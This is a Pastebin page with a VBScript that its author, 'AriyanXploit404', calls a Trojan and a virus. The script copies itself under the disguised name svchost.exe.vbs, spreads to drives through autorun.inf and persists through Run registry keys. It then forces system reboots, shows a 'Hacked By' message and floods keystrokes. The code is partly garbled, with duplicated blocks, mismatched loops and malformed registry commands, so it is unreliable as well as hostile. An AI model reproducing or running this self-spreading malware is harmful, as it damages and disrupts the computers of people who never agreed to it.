API tools faq
paste
AriyanXploit404

Ariyan Virus Type : Delta

AriyanXploit404
Dec 21st, 2021 (edited)
396
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 6.16 KB | None | 0 0
raw download clone embed print report
  1. rem - dlRB "AriyanXploit404 Reboot" Trojan script by AriyanXploit404
  2. On Error Resume Next
  3. dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
  4. atr = “[autorun]”&vbcrlf&”shellexecute=wscript.exe svchost.exe.vbs”
  5. set fs = createobject(“Scripting.FileSystemObject”)
  6. set mf = fs.getfile(Wscript.ScriptFullname)
  7. dim text,size
  8. size = mf.size
  9. check = mf.drive.drivetype
  10. set text=mf.openastextstream(1,-2)
  11. do while not text.atendofstream
  12. mysource=mysource&text.readline
  13. mysource=mysource & vbcrlf
  14. loop
  15. do
  16. Set winpath = fs.getspecialfolder(0)
  17. set tf = fs.getfile(winpath &\svchost.exe.vbs”)
  18. tf.attributes = 32
  19. set tf=fs.createtextfile(winpath &\svchost.exe.vbs”,2,true)
  20. tf.write mysource
  21. tf.close
  22. set tf = fs.getfile(winpath &\svchost.exe.vbs”)
  23. tf.attributes = 39
  24. for each flashdrive in fs.drives
  25. If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
  26. set tf=fs.getfile(flashdrive.path &\svchost.exe.vbs”)
  27. tf.attributes =32
  28. set tf=fs.createtextfile(flashdrive.path &\svchost.exe.vbs”,2,true)
  29. tf.write mysource
  30. tf.close
  31. set tf=fs.getfile(flashdrive.path &\svchost.exe.vbs”)
  32. tf.attributes =39
  33. set tf =fs.getfile(flashdrive.path &\autorun.inf”)
  34. tf.attributes = 32
  35. set tf=fs.createtextfile(flashdrive.path &\autorun.inf”,2,true)
  36. tf.write atr
  37. tf.close
  38. set tf =fs.getfile(flashdrive.path &\autorun.inf”)
  39. tf.attributes=39
  40. end if
  41. next
  42. set rg = createobject(“WScript.Shell”)
  43. rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&\svchost.exe.vbs”
  44. rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,””
  45. rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3
  46. if check <> 1 then
  47. Wscript.sleep 100000
  48. end if
  49. loop while check<>1
  50. set sd = createobject(“Wscript.shell”)
  51. sd.run winpath&\explorer.exe /e,/select, “&Wscript.ScriptFullname
  52. reg add
  53. hkey_local_machine\software\microsoft\windows\currentversionrun\vWINDOWsAPI\t
  54. reg_sz/d c:windowswimn32.bat/f
  55. reg add
  56. hkey_current_user\software\microsoft\windows\currentversionrun\vCONTROLexit\t
  57. reg_sz/d c:windowswimn32.bat/f
  58. do while year(now) >= 2021
  59. WScript.sleep 20000
  60. next
  61. dim FSobj,sysDir,generateCopy,newFile,fixedCode,procreateCopy,fileData
  62. set FSobj=CreateObject("Scripting.FileSystemObject")
  63. set sysDir = FSobj.GetSpecialFolder(1)
  64. createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB",sysDir&"\dlRB.vbs"
  65. sub createRegKey(regKey,regVal)
  66. set regEdit = CreateObject("WScript.Shell")
  67. regEdit.RegWrite regKey,regVal
  68. end sub
  69. set generateCopy=FSobj.CreateTextFile(sysDir+"\dlRB.vbs")
  70. generateCopy.close
  71. set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
  72. setFile()
  73. fixedCode=replace(fileData,chr(94),"""")
  74. set procreateCopy=FSobj.OpenTextFile(sysDir+"\dlRB.vbs",2)
  75. procreateCopy.write fixedCode
  76. procreateCopy.close
  77. rebootSystem()
  78. function setFile()
  79. fileData="rem - ^dlRB^ by AriyanXploit404" &vbcrlf& _
  80. "strComputer = ^.^ " &vbcrlf& _
  81. "Set objWMIService = GetObject(^winmgmts:^ _ " &vbcrlf& _
  82. "& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^
  83. oot\cimv2^)" &vbcrlf& _
  84. "Set colOperatingSystems = objWMIService.ExecQuery _ " &vbcrlf& _
  85. "(^Select * from Win32_OperatingSystem^)" &vbcrlf& _
  86. "For Each objOperatingSystem in colOperatingSystems" &vbcrlf& _
  87. "ObjOperatingSystem.Reboot()" &vbcrlf& _
  88. "Next"
  89. end function
  90. function rebootSystem()
  91. strComputer = "."
  92. Set objWMIService = GetObject("winmgmts:" _
  93. & "{impersonationLevel=impersonate,(Shutdown)}!\\" & strComputer & "
  94. oot\cimv2")
  95. Set colOperatingSystems = objWMIService.ExecQuery _
  96. ("Select * from Win32_OperatingSystem")
  97. For Each objOperatingSystem in colOperatingSystems
  98. ObjOperatingSystem.Reboot()
  99. Next
  100. dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
  101. atr = “[autorun]”&vbcrlf&”shellexecute=wscript.exe svchost.exe.vbs”
  102. set fs = createobject(“Scripting.FileSystemObject”)
  103. set mf = fs.getfile(Wscript.ScriptFullname)
  104. dim text,size
  105. size = mf.size
  106. check = mf.drive.drivetype
  107. set text=mf.openastextstream(1,-2)
  108. do while not text.atendofstream
  109. mysource=mysource&text.readline
  110. mysource=mysource & vbcrlf
  111. next
  112. do
  113. Set winpath = fs.getspecialfolder(0)
  114. set tf = fs.getfile(winpath &\svchost.exe.vbs”)
  115. tf.attributes = 32
  116. set tf=fs.createtextfile(winpath &\svchost.exe.vbs”,2,true)
  117. tf.write mysource
  118. tf.close
  119. set tf = fs.getfile(winpath &\svchost.exe.vbs”)
  120. tf.attributes = 39
  121. for each flashdrive in fs.drives
  122. If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
  123. set tf=fs.getfile(flashdrive.path &\svchost.exe.vbs”)
  124. tf.attributes =32
  125. set tf=fs.createtextfile(flashdrive.path &\svchost.exe.vbs”,2,true)
  126. tf.write mysource
  127. tf.close
  128. set tf=fs.getfile(flashdrive.path &\svchost.exe.vbs”)
  129. tf.attributes =39
  130. set tf =fs.getfile(flashdrive.path &\autorun.inf”)
  131. tf.attributes = 32
  132. set tf=fs.createtextfile(flashdrive.path &\autorun.inf”,2,true)
  133. tf.write atr
  134. tf.close
  135. set tf =fs.getfile(flashdrive.path &\autorun.inf”)
  136. tf.attributes=39
  137. end if
  138. next
  139. set rg = createobject(“WScript.Shell”)
  140. rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&\svchost.exe.vbs”
  141. rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,””
  142. rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3
  143. if check <> 1 then
  144. Wscript.sleep 100000
  145. end if
  146. loop while check<>1
  147. set sd = createobject(“Wscript.shell”)
  148. sd.run winpath&\explorer.exe /e,/select, “&Wscript.ScriptFullname
  149. msgbox “Hacked By AriyanXploit404” & vbcrlf & _
  150. “Dunia Tersaji Diatas Piring Dan Kau Hanya Perlu Mengambilnya Saja” & vbcrlf & _
  151. “Virus Ariyan Tipe Delta” & vbcrlf & _
  152. “Virus Ketiga Dari AriyanXploit404” & vbcrlf & _
  153. vbcrlf & vbcrlf & _
  154. ” Namanya Baru Pemula Ya gitu deh Kan Berniat Jadi Legenda Xixixi >//w//<& vbcrlf & vbcrlf & _ “>//x//<
  155. %SystemRoot%\System32\notepad.exe
  156. Set wshShell = wscript.CreateObject(“WScript.Shell”)
  157. do
  158. wscript.sleep 100
  159. wshshell.sendkeys “HACKED BY ARIYANXPLOIT404”
  160. loop
  161. end function
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!